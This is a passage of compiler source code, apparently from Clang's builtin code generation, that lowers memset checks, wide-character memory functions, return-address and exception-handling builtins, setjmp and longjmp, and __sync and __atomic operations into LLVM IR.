EmitNonNullArgCheck(RValue::get(Dest.getPointer()), E->getArg(0)->getType(),
E->getArg(0)->getExprLoc(), FD, 0);
Builder.CreateMemSet(Dest, ByteVal, SizeVal, false);
return RValue::get(Dest.getPointer());
}
case Builtin::BI__builtin___memset_chk: {
// fold __builtin_memset_chk(x, y, cst1, cst2) to memset iff cst1<=cst2.
Expr::EvalResult SizeResult, DstSizeResult;
if (!E->getArg(2)->EvaluateAsInt(SizeResult, CGM.getContext()) ||
!E->getArg(3)->EvaluateAsInt(DstSizeResult, CGM.getContext()))
break;
llvm::APSInt Size = SizeResult.Val.getInt();
llvm::APSInt DstSize = DstSizeResult.Val.getInt();
if (Size.ugt(DstSize))
break;
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Value *ByteVal = Builder.CreateTrunc(EmitScalarExpr(E->getArg(1)),
Builder.getInt8Ty());
Value *SizeVal = llvm::ConstantInt::get(Builder.getContext(), Size);
Builder.CreateMemSet(Dest, ByteVal, SizeVal, false);
return RValue::get(Dest.getPointer());
}
case Builtin::BI__builtin_wmemchr: {
// The MSVC runtime library does not provide a definition of wmemchr, so we
// need an inline implementation.
if (!getTarget().getTriple().isOSMSVCRT())
break;
llvm::Type *WCharTy = ConvertType(getContext().WCharTy);
Value *Str = EmitScalarExpr(E->getArg(0));
Value *Chr = EmitScalarExpr(E->getArg(1));
Value *Size = EmitScalarExpr(E->getArg(2));
BasicBlock *Entry = Builder.GetInsertBlock();
BasicBlock *CmpEq = createBasicBlock("wmemchr.eq");
BasicBlock *Next = createBasicBlock("wmemchr.next");
BasicBlock *Exit = createBasicBlock("wmemchr.exit");
Value *SizeEq0 = Builder.CreateICmpEQ(Size, ConstantInt::get(SizeTy, 0));
Builder.CreateCondBr(SizeEq0, Exit, CmpEq);
EmitBlock(CmpEq);
PHINode *StrPhi = Builder.CreatePHI(Str->getType(), 2);
StrPhi->addIncoming(Str, Entry);
PHINode *SizePhi = Builder.CreatePHI(SizeTy, 2);
SizePhi->addIncoming(Size, Entry);
CharUnits WCharAlign =
getContext().getTypeAlignInChars(getContext().WCharTy);
Value *StrCh = Builder.CreateAlignedLoad(WCharTy, StrPhi, WCharAlign);
Value *FoundChr = Builder.CreateConstInBoundsGEP1_32(WCharTy, StrPhi, 0);
Value *StrEqChr = Builder.CreateICmpEQ(StrCh, Chr);
Builder.CreateCondBr(StrEqChr, Exit, Next);
EmitBlock(Next);
Value *NextStr = Builder.CreateConstInBoundsGEP1_32(WCharTy, StrPhi, 1);
Value *NextSize = Builder.CreateSub(SizePhi, ConstantInt::get(SizeTy, 1));
Value *NextSizeEq0 =
Builder.CreateICmpEQ(NextSize, ConstantInt::get(SizeTy, 0));
Builder.CreateCondBr(NextSizeEq0, Exit, CmpEq);
StrPhi->addIncoming(NextStr, Next);
SizePhi->addIncoming(NextSize, Next);
EmitBlock(Exit);
PHINode *Ret = Builder.CreatePHI(Str->getType(), 3);
Ret->addIncoming(llvm::Constant::getNullValue(Str->getType()), Entry);
Ret->addIncoming(llvm::Constant::getNullValue(Str->getType()), Next);
Ret->addIncoming(FoundChr, CmpEq);
return RValue::get(Ret);
}
case Builtin::BI__builtin_wmemcmp: {
// The MSVC runtime library does not provide a definition of wmemcmp, so we
// need an inline implementation.
if (!getTarget().getTriple().isOSMSVCRT())
break;
llvm::Type *WCharTy = ConvertType(getContext().WCharTy);
Value *Dst = EmitScalarExpr(E->getArg(0));
Value *Src = EmitScalarExpr(E->getArg(1));
Value *Size = EmitScalarExpr(E->getArg(2));
BasicBlock *Entry = Builder.GetInsertBlock();
BasicBlock *CmpGT = createBasicBlock("wmemcmp.gt");
BasicBlock *CmpLT = createBasicBlock("wmemcmp.lt");
BasicBlock *Next = createBasicBlock("wmemcmp.next");
BasicBlock *Exit = createBasicBlock("wmemcmp.exit");
Value *SizeEq0 = Builder.CreateICmpEQ(Size, ConstantInt::get(SizeTy, 0));
Builder.CreateCondBr(SizeEq0, Exit, CmpGT);
EmitBlock(CmpGT);
PHINode *DstPhi = Builder.CreatePHI(Dst->getType(), 2);
DstPhi->addIncoming(Dst, Entry);
PHINode *SrcPhi = Builder.CreatePHI(Src->getType(), 2);
SrcPhi->addIncoming(Src, Entry);
PHINode *SizePhi = Builder.CreatePHI(SizeTy, 2);
SizePhi->addIncoming(Size, Entry);
CharUnits WCharAlign =
getContext().getTypeAlignInChars(getContext().WCharTy);
Value *DstCh = Builder.CreateAlignedLoad(WCharTy, DstPhi, WCharAlign);
Value *SrcCh = Builder.CreateAlignedLoad(WCharTy, SrcPhi, WCharAlign);
Value *DstGtSrc = Builder.CreateICmpUGT(DstCh, SrcCh);
Builder.CreateCondBr(DstGtSrc, Exit, CmpLT);
EmitBlock(CmpLT);
Value *DstLtSrc = Builder.CreateICmpULT(DstCh, SrcCh);
Builder.CreateCondBr(DstLtSrc, Exit, Next);
EmitBlock(Next);
Value *NextDst = Builder.CreateConstInBoundsGEP1_32(WCharTy, DstPhi, 1);
Value *NextSrc = Builder.CreateConstInBoundsGEP1_32(WCharTy, SrcPhi, 1);
Value *NextSize = Builder.CreateSub(SizePhi, ConstantInt::get(SizeTy, 1));
Value *NextSizeEq0 =
Builder.CreateICmpEQ(NextSize, ConstantInt::get(SizeTy, 0));
Builder.CreateCondBr(NextSizeEq0, Exit, CmpGT);
DstPhi->addIncoming(NextDst, Next);
SrcPhi->addIncoming(NextSrc, Next);
SizePhi->addIncoming(NextSize, Next);
EmitBlock(Exit);
PHINode *Ret = Builder.CreatePHI(IntTy, 4);
Ret->addIncoming(ConstantInt::get(IntTy, 0), Entry);
Ret->addIncoming(ConstantInt::get(IntTy, 1), CmpGT);
Ret->addIncoming(ConstantInt::get(IntTy, -1), CmpLT);
Ret->addIncoming(ConstantInt::get(IntTy, 0), Next);
return RValue::get(Ret);
}
case Builtin::BI__builtin_dwarf_cfa: {
// The offset in bytes from the first argument to the CFA.
//
// Why on earth is this in the frontend? Is there any reason at
// all that the backend can't reasonably determine this while
// lowering llvm.eh.dwarf.cfa()?
//
// TODO: If there's a satisfactory reason, add a target hook for
// this instead of hard-coding 0, which is correct for most targets.
int32_t Offset = 0;
Function *F = CGM.getIntrinsic(Intrinsic::eh_dwarf_cfa);
return RValue::get(Builder.CreateCall(F,
llvm::ConstantInt::get(Int32Ty, Offset)));
}
case Builtin::BI__builtin_return_address: {
Value *Depth = ConstantEmitter(*this).emitAbstract(E->getArg(0),
getContext().UnsignedIntTy);
Function *F = CGM.getIntrinsic(Intrinsic::returnaddress);
return RValue::get(Builder.CreateCall(F, Depth));
}
case Builtin::BI_ReturnAddress: {
Function *F = CGM.getIntrinsic(Intrinsic::returnaddress);
return RValue::get(Builder.CreateCall(F, Builder.getInt32(0)));
}
case Builtin::BI__builtin_frame_address: {
Value *Depth = ConstantEmitter(*this).emitAbstract(E->getArg(0),
getContext().UnsignedIntTy);
Function *F = CGM.getIntrinsic(Intrinsic::frameaddress, AllocaInt8PtrTy);
return RValue::get(Builder.CreateCall(F, Depth));
}
case Builtin::BI__builtin_extract_return_addr: {
Value *Address = EmitScalarExpr(E->getArg(0));
Value *Result = getTargetHooks().decodeReturnAddress(*this, Address);
return RValue::get(Result);
}
case Builtin::BI__builtin_frob_return_addr: {
Value *Address = EmitScalarExpr(E->getArg(0));
Value *Result = getTargetHooks().encodeReturnAddress(*this, Address);
return RValue::get(Result);
}
case Builtin::BI__builtin_dwarf_sp_column: {
llvm::IntegerType *Ty
= cast<llvm::IntegerType>(ConvertType(E->getType()));
int Column = getTargetHooks().getDwarfEHStackPointer(CGM);
if (Column == -1) {
CGM.ErrorUnsupported(E, "__builtin_dwarf_sp_column");
return RValue::get(llvm::UndefValue::get(Ty));
}
return RValue::get(llvm::ConstantInt::get(Ty, Column, true));
}
case Builtin::BI__builtin_init_dwarf_reg_size_table: {
Value *Address = EmitScalarExpr(E->getArg(0));
if (getTargetHooks().initDwarfEHRegSizeTable(*this, Address))
CGM.ErrorUnsupported(E, "__builtin_init_dwarf_reg_size_table");
return RValue::get(llvm::UndefValue::get(ConvertType(E->getType())));
}
case Builtin::BI__builtin_eh_return: {
Value *Int = EmitScalarExpr(E->getArg(0));
Value *Ptr = EmitScalarExpr(E->getArg(1));
llvm::IntegerType *IntTy = cast<llvm::IntegerType>(Int->getType());
assert((IntTy->getBitWidth() == 32 || IntTy->getBitWidth() == 64) &&
"LLVM's __builtin_eh_return only supports 32- and 64-bit variants");
Function *F =
CGM.getIntrinsic(IntTy->getBitWidth() == 32 ? Intrinsic::eh_return_i32
: Intrinsic::eh_return_i64);
Builder.CreateCall(F, {Int, Ptr});
Builder.CreateUnreachable();
// We do need to preserve an insertion point.
EmitBlock(createBasicBlock("builtin_eh_return.cont"));
return RValue::get(nullptr);
}
case Builtin::BI__builtin_unwind_init: {
Function *F = CGM.getIntrinsic(Intrinsic::eh_unwind_init);
return RValue::get(Builder.CreateCall(F));
}
case Builtin::BI__builtin_extend_pointer: {
// Extends a pointer to the size of an _Unwind_Word, which is
// uint64_t on all platforms. Generally this gets poked into a
// register and eventually used as an address, so if the
// addressing registers are wider than pointers and the platform
// doesn't implicitly ignore high-order bits when doing
// addressing, we need to make sure we zext / sext based on
// the platform's expectations.
//
// See: http://gcc.gnu.org/ml/gcc-bugs/2002-02/msg00237.html
// Cast the pointer to intptr_t.
Value *Ptr = EmitScalarExpr(E->getArg(0));
Value *Result = Builder.CreatePtrToInt(Ptr, IntPtrTy, "extend.cast");
// If that's 64 bits, we're done.
if (IntPtrTy->getBitWidth() == 64)
return RValue::get(Result);
// Otherwise, ask the codegen data what to do.
if (getTargetHooks().extendPointerWithSExt())
return RValue::get(Builder.CreateSExt(Result, Int64Ty, "extend.sext"));
else
return RValue::get(Builder.CreateZExt(Result, Int64Ty, "extend.zext"));
}
case Builtin::BI__builtin_setjmp: {
// Buffer is a void**.
Address Buf = EmitPointerWithAlignment(E->getArg(0));
// Store the frame pointer to the setjmp buffer.
Value *FrameAddr = Builder.CreateCall(
CGM.getIntrinsic(Intrinsic::frameaddress, AllocaInt8PtrTy),
ConstantInt::get(Int32Ty, 0));
Builder.CreateStore(FrameAddr, Buf);
// Store the stack pointer to the setjmp buffer.
Value *StackAddr =
Builder.CreateCall(CGM.getIntrinsic(Intrinsic::stacksave));
Address StackSaveSlot = Builder.CreateConstInBoundsGEP(Buf, 2);
Builder.CreateStore(StackAddr, StackSaveSlot);
// Call LLVM's EH setjmp, which is lightweight.
Function *F = CGM.getIntrinsic(Intrinsic::eh_sjlj_setjmp);
Buf = Builder.CreateBitCast(Buf, Int8PtrTy);
return RValue::get(Builder.CreateCall(F, Buf.getPointer()));
}
case Builtin::BI__builtin_longjmp: {
Value *Buf = EmitScalarExpr(E->getArg(0));
Buf = Builder.CreateBitCast(Buf, Int8PtrTy);
// Call LLVM's EH longjmp, which is lightweight.
Builder.CreateCall(CGM.getIntrinsic(Intrinsic::eh_sjlj_longjmp), Buf);
// longjmp doesn't return; mark this as unreachable.
Builder.CreateUnreachable();
// We do need to preserve an insertion point.
EmitBlock(createBasicBlock("longjmp.cont"));
return RValue::get(nullptr);
}
case Builtin::BI__builtin_launder: {
const Expr *Arg = E->getArg(0);
QualType ArgTy = Arg->getType()->getPointeeType();
Value *Ptr = EmitScalarExpr(Arg);
if (TypeRequiresBuiltinLaunder(CGM, ArgTy))
Ptr = Builder.CreateLaunderInvariantGroup(Ptr);
return RValue::get(Ptr);
}
case Builtin::BI__sync_fetch_and_add:
case Builtin::BI__sync_fetch_and_sub:
case Builtin::BI__sync_fetch_and_or:
case Builtin::BI__sync_fetch_and_and:
case Builtin::BI__sync_fetch_and_xor:
case Builtin::BI__sync_fetch_and_nand:
case Builtin::BI__sync_add_and_fetch:
case Builtin::BI__sync_sub_and_fetch:
case Builtin::BI__sync_and_and_fetch:
case Builtin::BI__sync_or_and_fetch:
case Builtin::BI__sync_xor_and_fetch:
case Builtin::BI__sync_nand_and_fetch:
case Builtin::BI__sync_val_compare_and_swap:
case Builtin::BI__sync_bool_compare_and_swap:
case Builtin::BI__sync_lock_test_and_set:
case Builtin::BI__sync_lock_release:
case Builtin::BI__sync_swap:
llvm_unreachable("Shouldn't make it through sema");
case Builtin::BI__sync_fetch_and_add_1:
case Builtin::BI__sync_fetch_and_add_2:
case Builtin::BI__sync_fetch_and_add_4:
case Builtin::BI__sync_fetch_and_add_8:
case Builtin::BI__sync_fetch_and_add_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Add, E);
case Builtin::BI__sync_fetch_and_sub_1:
case Builtin::BI__sync_fetch_and_sub_2:
case Builtin::BI__sync_fetch_and_sub_4:
case Builtin::BI__sync_fetch_and_sub_8:
case Builtin::BI__sync_fetch_and_sub_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Sub, E);
case Builtin::BI__sync_fetch_and_or_1:
case Builtin::BI__sync_fetch_and_or_2:
case Builtin::BI__sync_fetch_and_or_4:
case Builtin::BI__sync_fetch_and_or_8:
case Builtin::BI__sync_fetch_and_or_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Or, E);
case Builtin::BI__sync_fetch_and_and_1:
case Builtin::BI__sync_fetch_and_and_2:
case Builtin::BI__sync_fetch_and_and_4:
case Builtin::BI__sync_fetch_and_and_8:
case Builtin::BI__sync_fetch_and_and_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::And, E);
case Builtin::BI__sync_fetch_and_xor_1:
case Builtin::BI__sync_fetch_and_xor_2:
case Builtin::BI__sync_fetch_and_xor_4:
case Builtin::BI__sync_fetch_and_xor_8:
case Builtin::BI__sync_fetch_and_xor_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Xor, E);
case Builtin::BI__sync_fetch_and_nand_1:
case Builtin::BI__sync_fetch_and_nand_2:
case Builtin::BI__sync_fetch_and_nand_4:
case Builtin::BI__sync_fetch_and_nand_8:
case Builtin::BI__sync_fetch_and_nand_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Nand, E);
// Clang extensions: not overloaded yet.
case Builtin::BI__sync_fetch_and_min:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Min, E);
case Builtin::BI__sync_fetch_and_max:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Max, E);
case Builtin::BI__sync_fetch_and_umin:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::UMin, E);
case Builtin::BI__sync_fetch_and_umax:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::UMax, E);
case Builtin::BI__sync_add_and_fetch_1:
case Builtin::BI__sync_add_and_fetch_2:
case Builtin::BI__sync_add_and_fetch_4:
case Builtin::BI__sync_add_and_fetch_8:
case Builtin::BI__sync_add_and_fetch_16:
return EmitBinaryAtomicPost(*this, llvm::AtomicRMWInst::Add, E,
llvm::Instruction::Add);
case Builtin::BI__sync_sub_and_fetch_1:
case Builtin::BI__sync_sub_and_fetch_2:
case Builtin::BI__sync_sub_and_fetch_4:
case Builtin::BI__sync_sub_and_fetch_8:
case Builtin::BI__sync_sub_and_fetch_16:
return EmitBinaryAtomicPost(*this, llvm::AtomicRMWInst::Sub, E,
llvm::Instruction::Sub);
case Builtin::BI__sync_and_and_fetch_1:
case Builtin::BI__sync_and_and_fetch_2:
case Builtin::BI__sync_and_and_fetch_4:
case Builtin::BI__sync_and_and_fetch_8:
case Builtin::BI__sync_and_and_fetch_16:
return EmitBinaryAtomicPost(*this, llvm::AtomicRMWInst::And, E,
llvm::Instruction::And);
case Builtin::BI__sync_or_and_fetch_1:
case Builtin::BI__sync_or_and_fetch_2:
case Builtin::BI__sync_or_and_fetch_4:
case Builtin::BI__sync_or_and_fetch_8:
case Builtin::BI__sync_or_and_fetch_16:
return EmitBinaryAtomicPost(*this, llvm::AtomicRMWInst::Or, E,
llvm::Instruction::Or);
case Builtin::BI__sync_xor_and_fetch_1:
case Builtin::BI__sync_xor_and_fetch_2:
case Builtin::BI__sync_xor_and_fetch_4:
case Builtin::BI__sync_xor_and_fetch_8:
case Builtin::BI__sync_xor_and_fetch_16:
return EmitBinaryAtomicPost(*this, llvm::AtomicRMWInst::Xor, E,
llvm::Instruction::Xor);
case Builtin::BI__sync_nand_and_fetch_1:
case Builtin::BI__sync_nand_and_fetch_2:
case Builtin::BI__sync_nand_and_fetch_4:
case Builtin::BI__sync_nand_and_fetch_8:
case Builtin::BI__sync_nand_and_fetch_16:
return EmitBinaryAtomicPost(*this, llvm::AtomicRMWInst::Nand, E,
llvm::Instruction::And, true);
case Builtin::BI__sync_val_compare_and_swap_1:
case Builtin::BI__sync_val_compare_and_swap_2:
case Builtin::BI__sync_val_compare_and_swap_4:
case Builtin::BI__sync_val_compare_and_swap_8:
case Builtin::BI__sync_val_compare_and_swap_16:
return RValue::get(MakeAtomicCmpXchgValue(*this, E, false));
case Builtin::BI__sync_bool_compare_and_swap_1:
case Builtin::BI__sync_bool_compare_and_swap_2:
case Builtin::BI__sync_bool_compare_and_swap_4:
case Builtin::BI__sync_bool_compare_and_swap_8:
case Builtin::BI__sync_bool_compare_and_swap_16:
return RValue::get(MakeAtomicCmpXchgValue(*this, E, true));
case Builtin::BI__sync_swap_1:
case Builtin::BI__sync_swap_2:
case Builtin::BI__sync_swap_4:
case Builtin::BI__sync_swap_8:
case Builtin::BI__sync_swap_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Xchg, E);
case Builtin::BI__sync_lock_test_and_set_1:
case Builtin::BI__sync_lock_test_and_set_2:
case Builtin::BI__sync_lock_test_and_set_4:
case Builtin::BI__sync_lock_test_and_set_8:
case Builtin::BI__sync_lock_test_and_set_16:
return EmitBinaryAtomic(*this, llvm::AtomicRMWInst::Xchg, E);
case Builtin::BI__sync_lock_release_1:
case Builtin::BI__sync_lock_release_2:
case Builtin::BI__sync_lock_release_4:
case Builtin::BI__sync_lock_release_8:
case Builtin::BI__sync_lock_release_16: {
Value *Ptr = EmitScalarExpr(E->getArg(0));
QualType ElTy = E->getArg(0)->getType()->getPointeeType();
CharUnits StoreSize = getContext().getTypeSizeInChars(ElTy);
llvm::Type *ITy = llvm::IntegerType::get(getLLVMContext(),
StoreSize.getQuantity() * 8);
Ptr = Builder.CreateBitCast(Ptr, ITy->getPointerTo());
llvm::StoreInst *Store =
Builder.CreateAlignedStore(llvm::Constant::getNullValue(ITy), Ptr,
StoreSize);
Store->setAtomic(llvm::AtomicOrdering::Release);
return RValue::get(nullptr);
}
case Builtin::BI__sync_synchronize: {
// We assume this is supposed to correspond to a C++0x-style
// sequentially-consistent fence (i.e. this is only usable for
// synchronization, not device I/O or anything like that). This intrinsic
// is really badly designed in the sense that in theory, there isn't
// any way to safely use it... but in practice, it mostly works
// to use it with non-atomic loads and stores to get acquire/release
// semantics.
Builder.CreateFence(llvm::AtomicOrdering::SequentiallyConsistent);
return RValue::get(nullptr);
}
case Builtin::BI__builtin_nontemporal_load:
return RValue::get(EmitNontemporalLoad(*this, E));
case Builtin::BI__builtin_nontemporal_store:
return RValue::get(EmitNontemporalStore(*this, E));
case Builtin::BI__c11_atomic_is_lock_free:
case Builtin::BI__atomic_is_lock_free: {
// Call "bool __atomic_is_lock_free(size_t size, void *ptr)". For the
// __c11 builtin, ptr is 0 (indicating a properly-aligned object), since
// _Atomic(T) is always properly-aligned.
const char *LibCallName = "__atomic_is_lock_free";
CallArgList Args;
Args.add(RValue::get(EmitScalarExpr(E->getArg(0))),
getContext().getSizeType());
if (BuiltinID == Builtin::BI__atomic_is_lock_free)
Args.add(RValue::get(EmitScalarExpr(E->getArg(1))),
getContext().VoidPtrTy);
else
Args.add(RValue::get(llvm::Constant::getNullValue(VoidPtrTy)),
getContext().VoidPtrTy);
const CGFunctionInfo &FuncInfo =
CGM.getTypes().arrangeBuiltinFunctionCall(E->getType(), Args);
llvm::FunctionType *FTy = CGM.getTypes().GetFunctionType(FuncInfo);
llvm::FunctionCallee Func = CGM.CreateRuntimeFunction(FTy, LibCallName);
return EmitCall(FuncInfo, CGCallee::forDirect(Func),
ReturnValueSlot(), Args);
}
case Builtin::BI__atomic_test_and_set: {
// Look at the argument type to determine whether this is a volatile
// operation. The parameter type is always volatile.
QualType PtrTy = E->getArg(0)->IgnoreImpCasts()->getType();
bool Volatile =
PtrTy->castAs<PointerType>()->getPointeeType().isVolatileQualified();
Value *Ptr = EmitScalarExpr(E->getArg(0));
unsigned AddrSpace = Ptr->getType()->getPointerAddressSpace();
Ptr = Builder.CreateBitCast(Ptr, Int8Ty->getPointerTo(AddrSpace));
Value *NewVal = Builder.getInt8(1);
Value *Order = EmitScalarExpr(E->getArg(1));
if (isa<llvm::ConstantInt>(Order)) {
int ord = cast<llvm::ConstantInt>(Order)->getZExtValue();
AtomicRMWInst *Result = nullptr;
switch (ord) {
case 0: // memory_order_relaxed
default: // invalid order
Result = Builder.CreateAtomicRMW(llvm::AtomicRMWInst::Xchg, Ptr, NewVal,
llvm::AtomicOrdering::Monotonic);
break;
case 1: // memory_order_consume
case 2: // memory_order_acquire
Result = Builder.CreateAtomicRMW(llvm::AtomicRMWInst::Xchg, Ptr, NewVal,
llvm::AtomicOrdering::Acquire);
break;
case 3: // memory_order_release
Result = Builder.CreateAtomicRMW(llvm::AtomicRMWInst::Xchg, Ptr, NewVal,
llvm::AtomicOrdering::Release);
break;
case 4: // memory_order_acq_rel
Result = Builder.CreateAtomicRMW(llvm::AtomicRMWInst::Xchg, Ptr, NewVal,
llvm::AtomicOrdering::AcquireRelease);
break;
case 5: // memory_order_seq_cst
Result = Builder.CreateAtomicRMW(
llvm::AtomicRMWInst::Xchg, Ptr, NewVal,
llvm::AtomicOrdering::SequentiallyConsistent);
break;
}
Result->setVolatile(Volatile);
return RValue::get(Builder.CreateIsNotNull(Result, "tobool"));
}
llvm::BasicBlock *ContBB = createBasicBlock("atomic.continue", CurFn);
llvm::BasicBlock *BBs[5] = {
createBasicBlock("monotonic", CurFn),
createBasicBlock("acquire", CurFn),
createBasicBlock("release", CurFn),
createBasicBlock("acqrel", CurFn),
createBasicBlock("seqcst", CurFn)
};
llvm::AtomicOrdering Orders[5] = {
llvm::AtomicOrdering::Monotonic, llvm::AtomicOrdering::Acquire,
llvm::AtomicOrdering::Release, llvm::AtomicOrdering::AcquireRelease,
llvm::AtomicOrdering::SequentiallyConsistent};
Order = Builder.CreateIntCast(Order, Builder.getInt32Ty(), false);
llvm::SwitchInst *SI = Builder.CreateSwitch(Order, BBs[0]);
Builder.SetInsertPoint(ContBB);
PHINode *Result = Builder.CreatePHI(Int8Ty, 5, "was_set");
for (unsigned i = 0; i < 5; ++i) {
Builder.SetInsertPoint(BBs[i]);
AtomicRMWInst *RMW = Builder.CreateAtomicRMW(llvm::AtomicRMWInst::Xchg,
Ptr, NewVal, Orders[i]);
RMW->setVolatile(Volatile);
Result->addIncoming(RMW, BBs[i]);
Builder.CreateBr(ContBB);
}
SI->addCase(Builder.getInt32(0), BBs[0]);
SI->addCase(Builder.getInt32(1), BBs[1]);
SI->addCase(Builder.getInt32(2), BBs[1]);
SI->addCase(Builder.getInt32(3), BBs[2]);
SI->addCase(Builder.getInt32(4), BBs[3]);
SI->addCase(Builder.getInt32(5), BBs[4]);
Builder.SetInsertPoint(ContBB);
return RValue::get(Builder.CreateIsNotNull(Result, "tobool"));
}
case Builtin::BI__atomic_clear: {
QualType PtrTy = E->getArg(0)->IgnoreImpCasts()->getType();
bool Volatile =
PtrTy->castAs<PointerType>()->getPointeeType().isVolatileQualified();
Address Ptr = EmitPointerWithAlignment(E->getArg(0));
unsigned AddrSpace = Ptr.getPointer()->getType()->getPointerAddressSpace();
Ptr = Builder.CreateBitCast(Ptr, Int8Ty->getPointerTo(AddrSpace));
Value *NewVal = Builder.getInt8(0);
Value *Order = EmitScalarExpr(E->getArg(1));
if (isa<llvm::ConstantInt>(Order)) {
int ord = cast<llvm::ConstantInt>(Order)->getZExtValue();
StoreInst *Store = Builder.CreateStore(NewVal, Ptr, Volatile);
switch (ord) {
case 0: // memory_order_relaxed
default: // invalid order
Store->setOrdering(llvm::AtomicOrdering::Monotonic);
break;
case 3: // memory_order_release
Store->setOrdering(llvm::AtomicOrdering::Release);
break;
case 5: // memory_order_seq_cst
Store->setOrdering(llvm::AtomicOrdering::SequentiallyConsistent);
break;
}
return RValue::get(nullptr);
}
llvm::BasicBlock *ContBB = createBasicBlock("atomic.continue", CurFn);
llvm::BasicBlock *BBs[3] = {
createBasicBlock("monotonic", CurFn),
createBasicBlock("release", CurFn),
createBasicBlock("seqcst", CurFn)
};
llvm::AtomicOrdering Orders[3] = {
llvm::AtomicOrdering::Monotonic, llvm::AtomicOrdering::Release,
llvm::AtomicOrdering::SequentiallyConsistent};
Order = Builder.CreateIntCast(Order, Builder.getInt32Ty(), false);
llvm::SwitchInst *SI = Builder.CreateSwitch(Order, BBs[0]);
for (unsigned i = 0; i < 3; ++i) {
Builder.SetInsertPoint(BBs[i]);
StoreInst *Store = Builder.CreateStore(NewVal, Ptr, Volatile);
Store->setOrdering(Orders[i]);
Builder.CreateBr(ContBB);
}
SI->addCase(Builder.getInt32(0), BBs[0]);
SI->addCase(Builder.getInt32(3), BBs[1]);
SI->addCase(Builder.getInt32(5), BBs[2]);
Builder.SetInsertPoint(ContBB);
return RValue::get(nullptr);
}
case Builtin::BI__atomic_thread_fence:
case Builtin::BI__atomic_signal_fence:
case Builtin::BI__c11_atomic_thread_fence:
case Builtin::BI__c11_atomic_signal_fence: {
llvm::SyncScope::ID SSID;
if (BuiltinID == Builtin::BI__atomic_signal_fence ||
BuiltinID == Builtin::BI__c11_atomic_signal_fence)
SSID = llvm::SyncScope::SingleThread;
else
SSID = llvm::SyncScope::System;
Value *Order = EmitScalarExpr(E->getArg(0));
if (isa<llvm::ConstantInt>(Order)) {
int ord = cast<llvm::ConstantInt>(Order)->getZExtValue();
switch (ord) {
case 0: // memory_order_relaxed
default: // invalid order
break;
case 1: // memory_order_consume
case 2: // memory_order_acquire
Builder.CreateFence(llvm::AtomicOrdering::Acquire, SSID);
break;
case 3: // memory_order_release
Builder.CreateFence(llvm::AtomicOrdering::Release, SSID);
break;
case 4: // memory_order_acq_rel
Builder.CreateFence(llvm::AtomicOrdering::AcquireRelease, SSID);
break;
case 5: // memory_order_seq_cst
Builder.CreateFence(llvm::AtomicOrdering::SequentiallyConsistent, SSID);
break;
}
return RValue::get(nullptr);
}
llvm::BasicBlock *AcquireBB, *ReleaseBB, *AcqRelBB, *SeqCstBB;
AcquireBB = createBasicBlock("acquire", CurFn);
ReleaseBB = createBasicBlock("release", CurFn);
AcqRelBB = createBasicBlock("acqrel", CurFn);
SeqCstBB = createBasicBlock("seqcst", CurFn);
llvm::BasicBlock *ContBB = createBasicBlock("atomic.continue", CurFn);
Order = Builder.CreateIntCast(Order, Builder.getInt32Ty(), false);
llvm::SwitchInst *SI = Builder.CreateSwitch(Order, ContBB);
Builder.SetInsertPoint(AcquireBB);
Builder.CreateFence(llvm::AtomicOrdering::Acquire, SSID);
Builder.CreateBr(ContBB);
SI->addCase(Builder.getInt32(1), AcquireBB);
SI->addCase(Builder.getInt32(2), AcquireBB);
Builder.SetInsertPoint(ReleaseBB);
Builder.CreateFence(llvm::AtomicOrdering::Release, SSID);
Builder.CreateBr(ContBB);
SI->addCase(Builder.getInt32(3), ReleaseBB);
Builder.SetInsertPoint(AcqRelBB);
Builder.CreateFence(llvm::AtomicOrdering::AcquireRelease, SSID);
Builder.CreateBr(ContBB);
SI->addCase(Builder.getInt32(4), AcqRelBB);
Builder.SetInsertPoint(SeqCstBB);
Builder.CreateFence(llvm::AtomicOrdering::SequentiallyConsistent, SSID);
Builder.CreateBr(ContBB);
SI->addCase(Builder.getInt32(5), SeqCstBB);
Builder.SetInsertPoint(ContBB);
return RValue::get(nullptr);
}
case Builtin::BI__builtin_signbit:
case Builtin::BI__builtin_signbitf:
case Builtin::BI__builtin_signbitl: {
return RValue::get(
Builder.CreateZExt(EmitSignBit(*this, EmitScalarExpr(E->getArg(0))),
ConvertType(E->getType())));
}
case Builtin::BI__warn_memset_zero_len:
return RValue::getIgnored();
case Builtin::BI__annotation: {
// Re-encode each wide string to UTF8 and make an MDString.
SmallVector<Metadata *, 1> Strings;
for (const Expr *Arg : E->arguments()) {
const auto *Str = cast<StringLiteral>(Arg->IgnoreParenCasts());
assert(Str->getCharByteWidth() == 2);
StringRef WideBytes = Str->getBytes();
std::string StrUtf8;
if (!convertUTF16ToUTF8String(
makeArrayRef(WideBytes.data(), WideBytes.size()), StrUtf8)) {
CGM.ErrorUnsupported(E, "non-UTF16 __annotation argument");
continue;
}
Strings.push_back(llvm::MDString::get(getLLVMContext(), StrUtf8));
}
// Build and MDTuple of MDStrings and emit the intrinsic call.
llvm::Function *F =
CGM.getIntrinsic(llvm::Intrinsic::codeview_annotation, {});
MDTuple *StrTuple = MDTuple::get(getLLVMContext(), Strings);
Builder.CreateCall(F, MetadataAsValue::get(getLLVMContext(), StrTuple));
return RValue::getIgnored();
}
case Builtin::BI__builtin_annotation: {
llvm::Value *AnnVal = EmitScalarExpr(E->getArg(0));
llvm::Function *F = CGM.getIntrinsic(llvm::Intrinsic::annotation,
AnnVal->getType());
// Get the annotation string, go through casts. Sema requires this to be a
// non-wide string literal, potentially casted, so the cast<> is safe.
const Expr *AnnotationStrExpr = E->getArg(1)->IgnoreParenCasts();
StringRef Str = cast<StringLiteral>(AnnotationStrExpr)->getString();
return RValue::get(
EmitAnnotationCall(F, AnnVal, Str, E->getExprLoc(), nullptr));
}
case Builtin::BI__builtin_addcb:
case Builtin::BI__builtin_addcs:
case Builtin::BI__builtin_addc:
case Builtin::BI__builtin_addcl:
case Builtin::BI__builtin_addcll:
